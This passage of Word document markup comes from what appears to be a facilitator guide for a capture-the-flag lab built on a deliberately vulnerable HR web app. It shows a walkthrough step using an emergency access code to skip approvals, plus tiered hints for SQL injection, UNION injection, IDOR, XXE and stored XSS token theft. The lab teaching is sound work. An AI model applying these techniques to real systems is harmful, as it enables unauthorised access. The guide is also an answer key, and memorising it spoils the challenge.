      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Security → Emergency Access. Submit a request with the code found in step 3.7:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Reason: (anything)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Access Type: (any)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Duration: (any)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Emergency Access Code: BLACKOUT-7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Case-insensitive, compared with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>crypto.timingSafeEqual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Accepted → the request skips straight to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HR Approved</w:t>
      </w:r>
      <w:r>
        <w:t>, bypassing the normal Manager → Security → HR chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.10 — Exhibit C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Back on the case file page, answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"What emergency access code was contained in the internal HR migration documentation?"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>BLACKOUT-7</w:t>
      </w:r>
      <w:r>
        <w:t>. Combined with all nine flags true, this completes Stage 3 and reveals the flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Tiered hints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Three tiers per task — hand out progressively to a stuck player. Tier 3 stops short of the exact payload; pair it with the walkthrough above if you need the literal string.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296"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tier 1 (nudge)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tier 2 (names it)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tier 3 (near-spoiler)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The login form doesn’t behave like a normal one under unusual input. Try something a normal password never contains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>This is a classic SQL injection authentication bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A quote character breaks the query. Comment out the rest of it. Whoever you land on might not be who you want — look at what that account can actually see.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Logging in got you </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>somewhere</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, but not very far. There’s a smarter way to pick who you become.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The same injection point can target a specific row, not just "any row."</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION SELECT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the same table the login checks, ordered by whatever column represents privilege, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LIMIT 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The search box behaves oddly with certain characters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION-based SQL injection; count the columns the search results show you.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Close the string, close the grouping, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION SELECT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> matching the same number of columns, comment out the rest.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The URL for a profile carries an identifier. What happens if it’s not a normal one?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Same technique as Directory, different injection point (the ID itself), more columns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>It’s every column on the employee record plus one joined column — count carefully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A report lets you narrow results to "one segment." What if that filter isn’t validated the way you’d expect?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UNION injection again — small result shape this time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Three columns: a dimension, a metric name, a metric value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR staff can search requests by more or less anything. Push on that.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Same class of bug as Directory — but check the query shape carefully, it’s not identical.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nine columns, and — unlike Directory — you don’t need an extra closing parenthesis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Browsing the document list looks properly locked down. Does </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>every</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> way of reaching a document go through that same check?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>This is an authorization bug, not an injection — IDOR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The detail page only checks what </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kind</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> of document it is, not who it </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>belongs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to. Try IDs that aren’t in your own list.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Import / XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The bulk import feature parses XML. What else can XML do besides hold data?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>XXE — external entity injection. There’s a whole synthetic filesystem to explore, not just one file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Start with the migration notes. Follow what each file tells you to look at next.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Feedback / XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A feedback box that "previews" what you type is doing more than styling it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stored XSS — the preview isn’t escaping your input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> won’t fire this way. An image with a broken source and an error handler will. There’s a token sitting in a global variable on that page.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Emergency Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>This page has an approval chain — and a field that doesn’t obviously connect to anything else in the app.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>It’s not a bug in the code, it’s a workflow that still honors an old, undocumented shortcut.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>You’ve already found a code somewhere else in this investigation. Try it here.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. System architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Request lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>server.js  (single vanilla http.createServer, no framework)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
